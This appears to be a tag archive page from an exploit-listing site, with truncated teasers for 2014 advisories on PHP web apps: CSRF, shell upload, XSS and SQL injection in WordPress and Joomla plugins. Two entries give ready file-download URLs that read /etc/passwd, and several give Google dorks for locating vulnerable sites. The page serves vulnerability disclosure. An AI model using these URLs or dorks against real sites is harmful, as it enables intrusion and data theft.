Tags archives: php

 

0

DVWA Cross Site Request Forgery

<!– There are multiple CSRF issues in DVWA. Attackers can use these CSRF exploits to first reset the DVWA database of victim, then make the victim log in using the default resets, next crafts another CSRF to change the challenge level to low to make exploitation more probable, then use these to craft a command [...]

 

0

WordPress Slideshow Gallery 1.4.6 Shell Upload

#!/usr/bin/env python # # WordPress Slideshow Gallery 1.4.6 Shell Upload Exploit # # WordPress Slideshow Gallery plugin version 1.4.6 suffers from a remote shell upload vulnerability (CVE-2014-5460) # # Vulnerability discovered by: Jesus Ramirez Pichardo – http://whitexploit.blogspot.mx/ # # Exploit written by: Claudio Viviani – info@homelab.it – http://www.homelab.it # # # Disclaimer: # # This [...]

 

0

WordPress Photo Album Plus 5.4.4 Cross Site Scripting

WP Photo Album Plus Security Vulnerabilities   Author: Milhouse Download: https://wordpress.org/plugins/wp-photo-album-plus/ Home Page: http://wppa.opajaap.nl/ Google dork: inurl:wp-content/plugins/wp-photo-album-plus   Set up: Wordpress Version: 3.9.1, 3.9.2 WP Photo Album Plus version: 5.4.4, 5.4.3 Client browsers: FireFox 31, Internet Explorer 8-11   Issue number 1: A Cross-Site Scripting (reflective) vulnerability. Details: The plugin echoes the value of the [...]

 

0

Joomla Spider Form Maker 4.3 SQL Injection

######################   # Exploit Title : Joomla Spider Form Maker <= 4.3 SQLInjection   # Exploit Author : Claudio Viviani   # Vendor Homepage : http://web-dorado.com/   # Software Link : http://web-dorado.com/products/joomla-form.html   # Dork Google: inurl:com_formmaker     # Date : 2014-09-07   # Tested on : Windows 7 / Mozilla Firefox # Linux [...]

 

0

WordPress Plugin Vulnerability Dump – Part 2

More vulnerabilities in poorly coded plugins for y’all.   Ninja Forms v2.77 – Authorization bypass (regular users can delete forms, etc) Contact Form v3.83 – Email header injection WP to Twitter v2.9.3 – Authorization bypass (regular users can tweet to the admin’s twitter account) Xhanch – My Twitter v2.7.7 – CSRF (create and delete tweets) [...]

 

0

WordPress Spider Facebook 1.0.8 SQL Injection

###################### # Exploit Title : Wordpress Spider Facebook 1.0.8 Authenticated SQL Injection   # Exploit Author : Claudio Viviani   # Vendor Homepage : http://web-dorado.com/   # Software Link : http://downloads.wordpress.org/plugin/spider-facebook.1.0.8.zip   # Date : 2014-08-25   # Tested on : Windows 7 / Mozilla Firefox # Linux / Mozilla Firefox # Linux / sqlmap [...]

 

0

WordPress Like Dislike Counter 1.2.3 SQL Injection

################################################################################################# # # Title : Wordpress Like Dislike Counter Plugin SQL Injection Vulnerability # Risk : High+/Critical # Exploit Author : XroGuE # Google Dork : inurl:plugins/like-dislike-counter-for-posts-pages-and-comments/ajax_counter.php AND plugins/pro-like-dislike-counter/ldc-ajax-counter.php # Plugin Version : 1.2.3 # Plugin Name : Like Dislike Counter # Plugin Download Link : http://downloads.wordpress.org/plugin/like-dislike-counter-for-posts-pages-and-comments.zip # Vendor Home : www.wpfruits.com # Date : [...]

 

0

WordPress Bulk Delete Users By Email 1.0 CSRF

# Exploit Title: Bulk Delete Users by Email, Wordpress Plugin 1.0 – CSRF # Google Dork: N/A # Date: 05.09.2014 # Exploit Author: Fikri Fadzil – fikri.fadzil@impact-alliance.org # Vendor Homepage – http://www.speakdigital.co.uk/ # Software Link: https://wordpress.org/plugins/bulk-delete-users-by-email/ # Version: 1.0 # Tested on: PHP     Description: This plugin will allow administrator to delete user(s) account [...]

 

0

WordPress Urban City Arbitrary File Download

|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#| |————————————————————————-| |[*] Exploit Title: Wordpress urban city Arbitrary File Download Vulnerability | |[*] Google Dork: inurl:wp-content/themes/urbancity | |[*] Date : Date: 2014-09-07 | |[*] Exploit Author: Ashiyane Digital Security Team | |[*] Vendor Homepage : https://churchthemes.net/themes/urban-city/ | |[*] Tested on: Windows 7 | |————————————————————————-| | |[*] Location : [localhost]/wp-content/themes/urbancity/lib/scripts/download.php?file=/etc/passwd | |————————————————————————-| |[*] Proof: | [...]

 

0

WordPress Epic Arbitrary File Download

|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#| |————————————————————————-| |[*] Exploit Title: Wordpress epic theme Arbitrary File Download Vulnerability | |[*] Google Dork: inurl:wp-content/themes/epic | |[*] Date : Date: 2014-09-07 | |[*] Exploit Author: Ashiyane Digital Security Team | |[*] Vendor Homepage : http://www.organizedthemes.com/epic | |[*] Tested on: Windows 7 | |————————————————————————-| | |[*] Location : [localhost]/wp-content/themes/epic/includes/download.php?file=/etc/passwd | |————————————————————————-| |[*] Proof: | [...]